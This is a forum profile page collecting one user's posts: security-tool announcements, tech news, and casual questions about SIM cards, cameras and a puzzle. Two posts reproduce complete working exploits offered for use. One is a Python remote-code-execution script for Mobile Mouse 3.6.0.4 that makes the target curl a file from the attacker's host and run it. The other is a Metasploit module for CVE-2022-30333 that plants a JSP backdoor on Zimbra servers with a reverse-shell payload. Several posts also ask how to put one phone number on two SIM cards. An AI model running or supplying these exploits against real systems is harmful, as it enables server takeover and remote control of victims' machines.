Kev

Everything posted by Kev

  1. Tracee is a Runtime Security and forensics tool for Linux. It uses Linux eBPF technology to trace your system and applications at runtime, and analyzes collected events in order to detect suspicious behavioral patterns. It is usually delivered as a docker container, but there are other ways you can use it (even create your own customized tracee container). Check out the Tracee video hub for more videos.

    Documentation

    The full documentation of Tracee is available at https://aquasecurity.github.io/tracee/dev. You can use the version selector on top to view documentation for a specific version of Tracee.

    Quickstart

    Before you proceed, make sure you follow the minimum requirements for running Tracee.

    1. Running tracee:latest

    ```shell
    docker run \
      --name tracee --rm -it \
      --pid=host --cgroupns=host --privileged \
      -v /etc/os-release:/etc/os-release-host:ro \
      -e LIBBPFGO_OSRELEASE_FILE=/etc/os-release-host \
      aquasec/tracee:latest
    ```

    2. Running tracee:full

    ```shell
    docker run --name tracee --rm -it \
      --pid=host --cgroupns=host --privileged \
      -v /etc/os-release:/etc/os-release-host:ro \
      -e LIBBPFGO_OSRELEASE_FILE=/etc/os-release-host \
      -v /usr/src:/usr/src:ro \
      -v /lib/modules:/lib/modules:ro \
      -v /tmp/tracee:/tmp/tracee:rw \
      aquasec/tracee:full
    ```

    The default (latest) image is lightweight and portable. It is supposed to support different kernel versions without having to build source code. If the host kernel does not support BTF then you may use the full container image. The full container will compile an eBPF object during startup, if you do not have one already cached in /tmp/tracee. You may need to change the volume mounts for the kernel headers based on your setup. See the Linux Headers section for more info.

    Tracee supports enriching events with additional data from running containers. In order to enable this capability please look here.

    These docker commands run Tracee with default settings and start reporting detections to standard output. In order to simulate a suspicious behavior, you can simply run: strace ls in another terminal. This will trigger the Anti-Debugging signature, which is loaded by default, and you will get a warning:

    ```
    INFO: probing tracee-ebpf capabilities...
    INFO: starting tracee-ebpf...
    INFO: starting tracee-rules...
    Loaded 14 signature(s): [TRC-1 TRC-13 TRC-2 TRC-14 TRC-3 TRC-11 TRC-9 TRC-4 TRC-5 TRC-12 TRC-8 TRC-6 TRC-10 TRC-7]
    Serving metrics endpoint at :3366
    Serving metrics endpoint at :4466

    *** Detection ***
    Time: 2022-03-25T08:04:22Z
    Signature ID: TRC-2
    Signature: Anti-Debugging
    Data: map[]
    Command: strace
    Hostname: ubuntu-impish
    ```

    Trace

    In some cases, you might want to leverage Tracee's eBPF event collection capabilities directly, without involving the detection engine. This might be useful for debugging, troubleshooting, analysing, researching OR education. Execute the docker container with the word trace as an initial argument, and tracee-ebpf will be executed instead of the full tracee detection engine.

    ```shell
    docker run \
      --name tracee --rm -it \
      --pid=host --cgroupns=host --privileged \
      -v /etc/os-release:/etc/os-release-host:ro \
      -e LIBBPFGO_OSRELEASE_FILE=/etc/os-release-host \
      aquasec/tracee:latest \
      trace
    ```

    Components

    Tracee is composed of the following sub-projects, which are hosted in the aquasecurity/tracee repository:

    - Tracee-eBPF - Linux Tracing and Forensics using eBPF
    - Tracee-Rules - Runtime Security Detection Engine

    Tracee is an Aqua Security open source project. Learn about our open source work and portfolio Here. Join the community, and talk to us about any matter in GitHub Discussion or Slack.

    Download: tracee-main.zip or git clone https://github.com/aquasecurity/tracee.git Source
  2. This archive contains all of the 118 exploits added to Packet Storm in September, 2022. Download: 202209-exploits.tgz (351 KB) Source
  3. Dude, I don't like using the word "clone", I just want to have two SIM cards with the same number that don't work at the same time, one for home and the second for work.
  4. No dude, maybe I'm a car mechanic, or I work on a construction site, so I don't break the Android, and I can't do a redirect to the same number, the cards are old, expired, they can't be reactivated and, redirecting to the same number, take the card out, put it in the junker, and vice versa, I thought there might be some Android app so that both cards don't work at the same time.
  5. https://www.imyfone.com/mobile-transfer/how-to-clone-a-sim-card/
  6. Right. Edit: Quote doesn't work either on Opera, version is 90.0.4480.84
  7. I have a subscription, the SIM is dead, it's an expired prepaid, I can't even call 222, *133#, nothing, that's the one I want to bring back to life and have working at the same time.
  8. Hi, I want to connect a PC with 4 USB ports to a phone (remote control), I have iOS and a 17" Asus monitor, we want to watch a movie over a USB cable, is there an app? No hardware, USB cable, iOS phone, 17" PC monitor. Edit: / Android. Thanks
  9. Hi, I want to go hunting/fishing/picnicking, I don't know what adventures I'll get into out there... I want to "save" the phone number (the SIM) from an iOS (dual SIM) onto an old (cancelled) SIM, in order to save my personal number. Phone e.g. Nokia 3310, 5100 etc... The idea is that I don't want them to work at the same time, I just want to have a contact number when I go hiking, in case of emergencies, the pig, the cat, the dog dies, while the one at home (personal) stays offline. Is there an app that does this? (in case something happens, I get home and turn the personal number back on, the same number that got taken by the wave). In other words, I go hunting/fishing/picnicking, some idiot pushes me into the water and I fall in with the phone; so as not to ruin the iOS, I'd have a junker with me with the same number I have at home. Neither the old generations nor the new ones are waterproof, the first things affected are the SIMs (been there). I hope you understood. Thanks
  10. (A Microsoft logo sits illuminated at the World Mobile Congress at the Fira Gran Via Complex on Feb. 22, 2016, in Barcelona, Spain. Photo by David Ramos/Getty Images)

    Researchers on Tuesday reported that this past August they identified an attack path that lets malicious actors with file system access steal credentials for any Microsoft Teams user who's logged on. In a Sept. 13 blog post, the Vectra Protect team said that because attackers do not require elevated permissions to read these files, this potential concern is exposed to any attack that provides malicious actors with local or remote system access.

    The researchers said this vulnerability impacted all commercial and Government Community Cloud Desktop Teams clients for Windows, Mac and Linux. Microsoft has been made aware of this issue and closed the case in late August, stating that it did not meet its bar for immediate servicing.

    The Vectra researchers said until Microsoft moves to update the Teams Desktop Application, they don't recommend using the full Teams client and advise customers to consider using the web-based Teams application exclusively. The researchers said security teams should use the web-based Teams client inside Microsoft Edge, which has multiple OS-level controls to protect against token leaks. They said the Teams web application is robust and supports most features enabled through the desktop client, keeping the organization's productivity impacts to a minimum. For customers that must use the installed desktop application, the researchers said it's critical to watch key application files for access by any processes other than the official Teams application.

    When asked Thursday if the situation had changed, Aaron Turner, CTO, SaaS Protect at Vectra, said that to the Vectra team's knowledge, Microsoft had not changed its stance. Turner said in Vectra's interactions with customers, only those organizations with extreme exposure to sophisticated adversaries (defense contractors, critical infrastructure operators) are seriously considering eliminating the Teams.exe application on endpoints and forcing users to collaborate through Teams via a managed browser. Turner said most of the organizations he has talked to plan on implementing an endpoint detection and response monitoring policy to watch for any situations of unauthorized access by a system process to the file storage locations where the tokens are stored.

    Turner added that the work Vectra's Connor Peoples spearheaded to discover this vulnerability and coordinate his findings with Microsoft is part of Vectra's efforts to help make the Microsoft 365 ecosystem a safer and fairer place for any organization to communicate and collaborate. As outlined in the research, Turner said there are some improvements that Microsoft can make to shore up the Electron application for Windows and MacOS. He said those improvements should also help prevent future vulnerabilities, such as other recently disclosed problems relating to XSS attacks and potential command and control activity using GIFs.

    Sammy Migues, principal scientist at Synopsys Software Integrity Group, said like every application framework, Electron has its own idiosyncrasies related to authentication, secure file storage, and communications. Migues said development teams use frameworks for the same reason they use lots of other open source — it makes their jobs easier and faster. On the other hand, even security-aware teams might not understand what's really going on in the depths of the framework they're using. Migues said in this case, it appears that Electron might save some sensitive data in an insecure way.

    Via scmagazine.com/
  11. Mobile Mouse 3.6.0.4 Remote Code Execution (0day.today [2022-09-11], Source: 0day.today)

    ```python
    #!/usr/bin/env python3
    # Exploit Title: Mobile Mouse 3.6.0.4 Remote Code Execution
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://mobilemouse.com/
    # Software Link: https://www.mobilemouse.com/downloads/setup.exe
    # Version: 3.6.0.4
    # Tested on: Windows 10 Enterprise LTSC Build 17763

    import socket
    from time import sleep
    import argparse

    description = " Mobile Mouse 3.6.0.4 Remote Code Execution "
    parser = argparse.ArgumentParser(description=description)
    parser.add_argument("--target", help="Target IP", required=True)
    parser.add_argument("--file", help="File name to Upload", required=True)
    parser.add_argument("--lhost", help="Your local IP", default="127.0.0.1")
    args = parser.parse_args()

    host = args.target
    command_shell = args.file
    lhost = args.lhost
    port = 9099  # Default Port

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))

    # Raw protocol messages as captured by the author (hex-encoded)
    CONN = bytearray.fromhex("434F4E4E4543541E1E63686F6B726968616D6D6564691E6950686F6E651E321E321E04")
    s.send(CONN)
    run = s.recv(54)

    RUN = bytearray.fromhex("4b45591e3131341e721e4f505404")
    s.send(RUN)
    run = s.recv(54)
    sleep(0.5)

    # Windows paths need escaped backslashes; the original f-string relied on invalid escapes
    download_string = f"curl http://{lhost}:8080/{command_shell} -o c:\\Windows\\Temp\\{command_shell}".encode("utf-8")
    hex_shell = download_string.hex()
    SHELL = bytearray.fromhex("4B45591E3130301E" + hex_shell + "1E04" + "4b45591e2d311e454e5445521e04")
    s.send(SHELL)
    shell = s.recv(96)
    print("Executing The Command Shell...")
    sleep(5)

    RUN2 = bytearray.fromhex("4b45591e3131341e721e4f505404")
    s.send(RUN2)
    run2 = s.recv(54)
    sleep(0.8)

    shell_string = f"c:\\Windows\\Temp\\{command_shell}".encode("utf-8")
    hex_run = shell_string.hex()
    RUN3 = bytearray.fromhex("4B45591E3130301E" + hex_run + "1E04" + "4b45591e2d311e454e5445521e04")
    s.send(RUN3)
    run3 = s.recv(96)
    print(" Take The Rose")
    sleep(50)
    s.close()
    ```
  12. Parental Control, it puts it into airplane mode, you're basically buying him a makeup compact.
  13. Fill up the fridge. On topic: as far as I know you can do purge spammer % delete
  14. Good concept, that is as long as you don't have Supermarket-style intentions, so that I don't stop getting my gas bills. On topic: you can convert from html, http, csf, ncsf into whatever you want with grep, import them (paid) into smsglobal (if you have a subscription) to make it legit or, ... I'll come back with an edit
  15. Another reason not to play 1989's Rhythm Nation – it messes with some hard disk drives

    The music video for Janet Jackson's 1989 pop hit Rhythm Nation has been recognized as an exploit for a cybersecurity vulnerability after Microsoft reported it can crash old laptop computers. The story detailed how "a major computer manufacturer discovered that playing the music video for Janet Jackson's Rhythm Nation would crash certain models of laptops." Further investigation revealed that multiple manufacturers' machines also crashed. Sometimes playing the video on one laptop would crash another nearby laptop. This is mysterious because the song isn't actually that bad.

    Investigation revealed that all the crashing laptops shared the same 5400 RPM hard disk drive. The manufacturer that found the problem apparently added a custom filter in the audio pipeline to detect and remove the offending frequencies during audio playback.

    Few modern machines have hard disk drives, never mind drives that rotate at the unfashionably slow speed of 5400 revolutions per minute. Also, hardly anybody listens to Janet Jackson anymore. The Register nonetheless reports this news because The Mitre Corporation has seen fit to list it on the register of Common Vulnerabilities and Exposures (CVEs) – the definitive list of cybersecurity vulnerabilities we all need to watch out for. It's listed as CVE-2022-38392 and has already been acknowledged by security vendor Tenable.

    While the bug seems comical, side-channel attacks are a real threat. Israeli researcher Mordechai Guri has found ways to attack computers including by making memory emit radiation in the same bands used by Wi-Fi and encoding information into those emissions.

    Owners of laptops with old, slow, hard disks therefore need to be very careful if they hear Janet Jackson tunes while they work – which is why we've not embedded Rhythm Nation in this story. But it does feel safe to remind readers of the weirdest bug The Register has previously encountered: Cisco's alert about cosmic rays crashing some kit.

    Via theregister.com
  16. (A simple text editor on the web where you can write and compute.) Alain Marty | last update: 2022/08/15 URL: http://lambdaway.free.fr/lambdawalks/
  17. Similar to DALL-E 2.0. Midjourney is an independent research lab exploring new mediums of thought and expanding the imaginative powers of the human species. There are two ways to experience the tools: the Midjourney Bot, which you can use to generate images, and the web app at https://www.midjourney.com/app/ , where you can find a gallery of your own work and other users' creations. You can use our Midjourney Bot on our official Discord server (https://discord.gg/midjourney) as well as on any other Discord server where it has been set up. If you wish to invite the bot to your own community, follow the instructions on this page: Use Midjourney on your own Discord Server. URL: https://www.midjourney.com/home/ Got it from a colleague. Enjoy!
  18. Puzzle

    I solved it too, it was harder, Figure #49. Leave me an address in PM for EGLD (Elrond), BTC has a high fee. P.S. I'll post the solution for Figure #50, I forgot to record it.
  19. Puzzle

    Hi, we're trying to pass a puzzle test, https://figure.game, with above-average IQ; every time we get stuck at the last piece, out of 10 moves left we end up with one. Can anyone solve it? There's a bottle of wine in crypto in it. Edit: 3 moves, we're left with one piece, teasing? P.S. moderators, in case I posted in the wrong place and not in Challenges (CTF), it can be moved/deleted or Trashed. P.S.2. first come, first served. Enjoy!
  20. Camera Mini - Wifi

    OK, understood, it's junk, is there anything identical but of quality? I've dipped into my reserves, I have 130 RON left (cigarettes). No cables, I want to attach it outside at the corner of the door, no cables, no drilling the walls full of holes, etc...
  21. Hi, for some time (a few months) I've been looking for a mini video camera to watch the office from outside. What I found by chance in Facebook ads is: https://oricare.ro/products/camera-wifi-mini I don't want to drill the walls, I want to place it outside. ^ it has 120 min of battery life. I found one at 69 RON with 180 min battery life. Are they trustworthy? Max budget 150 RON @Wav3 What do you recommend? Sure. Thanks
  22. socialscan is an accurate command-line tool to check for email and social media username usage on online platforms. Given an email address or username, socialscan returns whether it is available, taken or invalid on online platforms.

    Other similar tools check username availability by requesting the profile page of the username in question and, based on information like the HTTP status code or error text on the requested page, determine whether a username is already taken. This is a naive approach that fails in the following cases:

    - Reserved keywords: Most platforms have a set of keywords that they don't allow to be used in usernames (A simple test: try checking reserved words like 'admin' or 'home' or 'root' and see if other services mark them as available)
    - Deleted/banned accounts: Deleted/banned account usernames tend to be unavailable even though the profile pages might not exist

    Therefore, these tools tend to come up with false positives and negatives. This method of checking is also dependent on platforms having web-based profile pages and cannot be extended to email addresses. socialscan aims to plug these gaps by directly querying the registration servers of the platforms instead, retrieving the appropriate CSRF tokens, headers, and cookies.

    Install socialscan Command-Line Tool To Check For Email And Social Media Username Usage

    pip:

    ```shell
    pip install socialscan
    ```

    From source:

    ```shell
    git clone https://github.com/iojw/socialscan.git
    cd socialscan
    pip install .
    ```

    Usage:

    ```
    usage: socialscan [list of usernames/email addresses to check]

    optional arguments:
      -h, --help            show this help message and exit
      --platforms [platform [platform ...]], -p [platform [platform ...]]
                            list of platforms to query (default: all platforms)
      --view-by {platform,query}
                            view results sorted by platform or by query (default: query)
      --available-only, -a  only print usernames/email addresses that are available and not in use
      --cache-tokens, -c    cache tokens for platforms requiring more than one HTTP request (Snapchat, GitHub, Instagram. Lastfm & Tumblr), reducing total number of requests sent
      --input input.txt, -i input.txt
                            file containg list of queries to execute
      --proxy-list proxy_list.txt
                            file containing list of HTTP proxy servers to execute queries with
      --verbose, -v         show query responses as they are received
      --show-urls           display profile URLs for usernames on supported platforms (profiles may not exist if usernames are reserved or belong to deleted/banned accounts)
      --json json.txt       output results in JSON format to the specified file
      --version             show program's version number and exit
    ```

    You can download socialscan here: socialscan-v1.4.2.zip Or read more here. Sources: darknet.org.uk github.com
  23. This Metasploit module creates a RAR file that can be emailed to a Zimbra server to exploit CVE-2022-30333. If successful, it plants a JSP-based backdoor in the public web directory, then executes that backdoor. The core vulnerability is a path-traversal issue in unRAR that can extract an arbitrary file to an arbitrary location on a Linux system. This issue is exploitable on Zimbra Collaboration versions 9.0.0 Patch 24 and below and 8.8.15 Patch 31 and below, provided that UnRAR versions 6.11 or below are installed.

    ```ruby
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::FILEFORMAT
      include Msf::Exploit::EXE
      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::FileDropper
      include Msf::Exploit::Format::RarSymlinkPathTraversal

      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'UnRAR Path Traversal in Zimbra (CVE-2022-30333)',
            'Description' => %q{
              This module creates a RAR file that can be emailed to a Zimbra server
              to exploit CVE-2022-30333. If successful, it plants a JSP-based backdoor
              in the public web directory, then executes that backdoor.

              The core vulnerability is a path-traversal issue in unRAR that can
              extract an arbitrary file to an arbitrary location on a Linux system.

              This issue is exploitable on the following versions of Zimbra, provided
              UnRAR version 6.11 or earlier is installed:

              * Zimbra Collaboration 9.0.0 Patch 24 (and earlier)
              * Zimbra Collaboration 8.8.15 Patch 31 (and earlier)
            },
            'Author' => [
              'Simon Scannell', # Discovery / initial disclosure (via Sonar)
              'Ron Bowes', # Analysis, PoC, and module
            ],
            'License' => MSF_LICENSE,
            'References' => [
              ['CVE', '2022-30333'],
              ['URL', 'https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/'],
              ['URL', 'https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946'],
              ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25'],
              ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P32'],
              ['URL', 'https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis'],
            ],
            'Platform' => 'linux',
            'Arch' => [ARCH_X86, ARCH_X64],
            'Targets' => [
              [ 'Zimbra Collaboration Suite', {} ]
            ],
            'DefaultOptions' => {
              'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
              'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/',
              'TARGET_FILENAME' => nil,
              'DisablePayloadHandler' => false,
              'RPORT' => 443,
              'SSL' => true
            },
            'Stance' => Msf::Exploit::Stance::Passive,
            'DefaultTarget' => 0,
            'Privileged' => false,
            'DisclosureDate' => '2022-06-28',
            'Notes' => {
              'Stability' => [CRASH_SAFE],
              'Reliability' => [REPEATABLE_SESSION],
              'SideEffects' => [IOC_IN_LOGS]
            }
          )
        )

        register_options(
          [
            OptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']),
            # Separating the path, filename, and extension allows us to randomize the filename
            OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - "../../").']),
            OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']),
          ]
        )

        register_advanced_options(
          [
            OptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (must be 12 characters or less; default: random)']),
            OptBool.new('TRIGGER_PAYLOAD', [ false, 'If set, attempt to trigger the payload via an HTTP request.', true ]),
            # Took this from multi/handler
            OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions.', 0 ]),
            OptInt.new('CheckInterval', [ true, 'The number of seconds to wait between each attempt to trigger the payload on the server.', 5 ])
          ]
        )
      end

      # Generate an on-system filename using datastore options
      def generate_target_filename
        if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp')
          print_warning('TARGET_FILENAME does not end with .jsp, was that intentional?')
        end

        File.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || "#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp")
      end

      # Normalize the path traversal and figure out where it is relative to the web root
      def zimbra_get_public_path(target_filename)
        # Normalize the path
        normalized_path = Pathname.new(File.join('/opt/zimbra/data/amavisd/tmp', target_filename)).cleanpath

        # Figure out where it is, relative to the webroot
        webroot = Pathname.new('/opt/zimbra/jetty_base/webapps/zimbra/')
        relative_path = normalized_path.relative_path_from(webroot)

        # Hopefully, we found a path from the webroot to the payload!
        if relative_path.to_s.start_with?('../')
          return nil
        end

        relative_path
      end

      def exploit
        print_status('Encoding the payload as a .jsp file')
        payload = Msf::Util::EXE.to_jsp(generate_payload_exe)

        # Create a file
        target_filename = generate_target_filename
        print_status("Target filename: #{target_filename}")

        begin
          rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), target_filename, payload)
        rescue StandardError => e
          fail_with(Failure::BadConfig, "Failed to encode RAR file: #{e}")
        end

        file_create(rar)
        print_good('File created! Email the file above to any user on the target Zimbra server')

        # Bail if they don't want the payload triggered
        return unless datastore['TRIGGER_PAYLOAD']

        # Get the public path for triggering the vulnerability, terminate if we
        # can't figure it out
        public_filename = zimbra_get_public_path(target_filename)
        if public_filename.nil?
          print_warning('Could not determine the public web path, disabling payload triggering')
          return
        end

        register_file_for_cleanup(target_filename)

        interval = datastore['CheckInterval'].to_i
        print_status("Trying to trigger the backdoor @ #{public_filename} every #{interval}s [backgrounding]...")

        # This loop is mostly from `multi/handler`
        stime = Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i
        timeout = datastore['ListenerTimeout'].to_i
        loop do
          break if session_created?
          break if timeout > 0 && (stime + timeout < Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i)

          res = send_request_cgi(
            'method' => 'GET',
            'uri' => normalize_uri(public_filename)
          )
          unless res
            fail_with(Failure::Unknown, 'Could not connect to the server to trigger the payload')
          end

          Rex::ThreadSafe.sleep(interval)
        end
      end
    end
    ```

    Source